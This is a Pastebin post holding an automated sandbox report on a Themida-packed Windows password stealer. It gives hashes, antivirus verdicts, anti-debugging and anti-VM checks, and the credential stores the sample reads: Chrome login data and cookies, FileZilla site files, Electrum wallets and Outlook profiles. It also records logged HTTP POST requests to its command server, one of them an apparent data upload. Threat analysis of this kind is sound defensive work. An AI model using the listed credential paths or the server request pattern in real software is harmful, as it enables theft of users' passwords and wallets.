Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: "PWS"
- * MalScore: 10.0
- * File Name: "Exes_e33a5f4a777379a78e0bc97233165086.exe"
- * File Size: 2332672
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "6d7c499dd21d535614b09dc8a829a0275ec5d894fa1650ad0414190aa5881d17"
- * MD5: "e33a5f4a777379a78e0bc97233165086"
- * SHA1: "4d875b06b43adf30958f6c89c05cee69fe28dfae"
- * SHA512: "d8e920d7e852329a861c0822ffc5d52354ab4654afd4d779e2599c26ba5bd5ab19e69c9424f5a9047cd5e47c85190b9f08c93258cf3e2dc6613c1d5e45922ccb"
- * CRC32: "EBA7CF7C"
- * SSDEEP: "49152:nbWIWyshYNZvpnpgNm0wzHMV1CnuDG9yMcFdyTTbfbttdSTNB9cu:nbZf79zHcU8dybfbzdI39c"
- * Process Execution:
- "Exes_e33a5f4a777379a78e0bc97233165086.exe",
- "services.exe"
- * Executed Commands:
- "C:\\Windows\\system32\\lsass.exe"
- * Signatures Detected:
- "Description": "Creates RWX memory",
- "Details":
- "Description": "Expresses interest in specific running processes",
- "Details":
- "process": "System"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "suspicious_request": "http://newsjonhforyou.info/api/check.get"
- "suspicious_request": "http://newsjonhforyou.info/api/gate.get?p1=0&p2=6&p3=0&p4=0&p5=0&p6=0&p7=0&p8=1&p9=0"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://newsjonhforyou.info/api/check.get"
- "url": "http://newsjonhforyou.info/api/gate.get?p1=0&p2=6&p3=0&p4=0&p5=0&p6=0&p7=0&p8=1&p9=0"
- "Description": "The binary likely contains encrypted or compressed data.",
- "Details":
- "section": "name: \\x00 , entropy: 7.98, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x0002be00, virtual_size: 0x00056000"
- "section": "name: usasoewk, entropy: 7.93, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x0020a000, virtual_size: 0x0020a000"
- "Description": "Detects Sandboxie through the presence of a library",
- "Details":
- "Description": "Checks for the presence of known windows from debuggers and forensic tools",
- "Details":
- "Window": "OLLYDBG"
- "Window": "GBDYLLO"
- "Window": "pediy06"
- "Window": "FilemonClass"
- "Window": "File Monitor - Sysinternals: www.sysinternals.com"
- "Window": "PROCMON_WINDOW_CLASS"
- "Window": "Process Monitor - Sysinternals: www.sysinternals.com"
- "Window": "RegmonClass"
- "Window": "Registry Monitor - Sysinternals: www.sysinternals.com"
- "Window": "18467-41"
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 15137400 times"
- "Description": "Steals private information from local Internet browsers",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
- "Description": "The following process appear to have been packed with Themida: Exes_e33a5f4a777379a78e0bc97233165086.exe",
- "Details":
- "Description": "Collects information about installed applications",
- "Details":
- "Program": "Google Update Helper"
- "Program": "Microsoft Excel MUI 2013"
- "Program": "Microsoft Outlook MUI 2013"
- "Program": "Google Chrome"
- "Program": "Adobe Flash Player 29 NPAPI"
- "Program": "Adobe Flash Player 29 ActiveX"
- "Program": "Microsoft DCF MUI 2013"
- "Program": "Microsoft Access MUI 2013"
- "Program": "Microsoft Office Proofing Tools 2013 - English"
- "Program": "Adobe Acrobat Reader DC"
- "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xef\\xbf\\xb1ol"
- "Program": "Microsoft Publisher MUI 2013"
- "Program": "Outils de v\\xef\\xbf\\xa9rification linguistique 2013 de Microsoft Office\\xef\\xbe\\xa0- Fran\\xef\\xbf\\xa7ais"
- "Program": "Microsoft Office Shared MUI 2013"
- "Program": "Microsoft Office OSM MUI 2013"
- "Program": "Microsoft InfoPath MUI 2013"
- "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
- "Program": "Microsoft Word MUI 2013"
- "Program": "Microsoft Groove MUI 2013"
- "Program": "Microsoft Access Setup Metadata MUI 2013"
- "Program": "Microsoft Office OSM UX MUI 2013"
- "Program": "Java Auto Updater"
- "Program": "Microsoft PowerPoint MUI 2013"
- "Program": "Microsoft Office Professional Plus 2013"
- "Program": "Adobe Refresh Manager"
- "Program": "Microsoft Office Proofing 2013"
- "Program": "Microsoft Lync MUI 2013"
- "Program": "Microsoft OneNote MUI 2013"
- "Description": "Checks for the presence of known devices from debuggers and forensic tools",
- "Details":
- "Description": "Detects the presence of Wine emulator via registry key",
- "Details":
- "Description": "File has been identified by 35 Antiviruses on VirusTotal as malicious",
- "Details":
- "MicroWorld-eScan": "Trojan.GenericKD.32252428"
- "FireEye": "Generic.mg.e33a5f4a777379a7"
- "McAfee": "Artemis!E33A5F4A7773"
- "K7AntiVirus": "Trojan ( 0054fee91 )"
- "Alibaba": "Packed:Win32/Themida.b5e685f6"
- "K7GW": "Trojan ( 0054fee91 )"
- "Cybereason": "malicious.6b43ad"
- "Symantec": "ML.Attribute.HighConfidence"
- "APEX": "Malicious"
- "Paloalto": "generic.ml"
- "Kaspersky": "HEUR:Trojan.Win32.Generic"
- "BitDefender": "Trojan.GenericKD.32252428"
- "AegisLab": "Trojan.Win32.Generic.4!c"
- "Ad-Aware": "Trojan.GenericKD.32252428"
- "Emsisoft": "Trojan.GenericKD.32252428 (B)"
- "F-Secure": "Trojan.TR/Crypt.TPM.Gen"
- "DrWeb": "Trojan.PWS.Siggen2.27274"
- "Invincea": "heuristic"
- "McAfee-GW-Edition": "BehavesLike.Win32.Ramnit.vc"
- "Sophos": "Mal/Generic-S"
- "SentinelOne": "DFI - Malicious PE"
- "Avira": "TR/Crypt.TPM.Gen"
- "MAX": "malware (ai score=83)"
- "Microsoft": "Trojan:Win32/Tiggre!plock"
- "Endgame": "malicious (high confidence)"
- "ZoneAlarm": "HEUR:Trojan.Win32.Generic"
- "AhnLab-V3": "Malware/Gen.Mlwr.C2902868"
- "Acronis": "suspicious"
- "ESET-NOD32": "a variant of Win32/Packed.Themida.FPI"
- "Rising": "[email protected] (RDMK:zuuW/bwa84DIQAfzjSDLBQ)"
- "Ikarus": "Trojan.Win32.Themida"
- "GData": "Trojan.GenericKD.32252428"
- "Webroot": "W32.Trojan.Gen"
- "CrowdStrike": "win/malicious_confidence_100% (W)"
- "Qihoo-360": "HEUR/QVM19.1.2DA5.Malware.Gen"
- "Description": "Checks the version of Bios, possibly for anti-virtualization",
- "Details":
- "Description": "Detects VirtualBox using ACPI tricks",
- "Details":
- "Description": "Detects VirtualBox through the presence of a registry key",
- "Details":
- "Description": "Attempts to access Bitcoin/ALTCoin wallets",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets"
- "Description": "Harvests credentials from local FTP client softwares",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\sitemanager.xml"
- "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
- "Description": "Harvests information related to installed instant messenger clients",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
- "Description": "Harvests information related to installed mail clients",
- "Details":
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\SMTP Server"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\SMTP Server"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
- "Description": "Anomalous binary characteristics",
- "Details":
- "anomaly": "Unprintable characters found in section name"
- "anomaly": "Actual checksum does not match that reported in PE header"
- * Started Service:
- "VaultSvc"
- * Mutexes:
- "DBWinMutex",
- "s3v9x9w8v7v9x9w8v7"
- * Modified Files:
- "\\??\\SICE",
- "\\??\\SIWVID",
- "\\??\\NTICE"
- * Deleted Files:
- * Modified Registry Keys:
- * Deleted Registry Keys:
- * DNS Communications:
- "type": "A",
- "request": "newsjonhforyou.info",
- "answers":
- "data": "104.28.19.37",
- "type": "A"
- "data": "104.28.18.37",
- "type": "A"
- * Domains:
- "ip": "104.28.19.37",
- "domain": "newsjonhforyou.info"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "",
- "uri": "http://newsjonhforyou.info/api/check.get",
- "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.2390.121 Safari/537.36",
- "method": "POST",
- "host": "newsjonhforyou.info",
- "version": "1.1",
- "path": "/api/check.get",
- "data": "POST /api/check.get HTTP/1.1\r\nContent-Type: text/html\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.2390.121 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\r\nHost: newsjonhforyou.info\r\nContent-Length: 0\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://newsjonhforyou.info/api/gate.get?p1=0&p2=6&p3=0&p4=0&p5=0&p6=0&p7=0&p8=1&p9=0",
- "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.2390.121 Safari/537.36",
- "method": "POST",
- "host": "newsjonhforyou.info",
- "version": "1.1",
- "path": "/api/gate.get?p1=0&p2=6&p3=0&p4=0&p5=0&p6=0&p7=0&p8=1&p9=0",
- "data": "POST /api/gate.get?p1=0&p2=6&p3=0&p4=0&p5=0&p6=0&p7=0&p8=1&p9=0 HTTP/1.1\r\nversion: 52XQchpiV08le1v7WNmMtd/Q93TFnpAwaZU=\r\nContent-Type: multipart/form-data; boundary=---------------------------228\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.2390.121 Safari/537.36\r\nHost: newsjonhforyou.info\r\nContent-Length: 3876\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nCookie: __cfduid=d79f5f1c36fd3fc93e4c8f264cc6a3d751565797994; SID_INTERFICE=a83a23e4555a22a6a9b8323d4261c82485917621\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment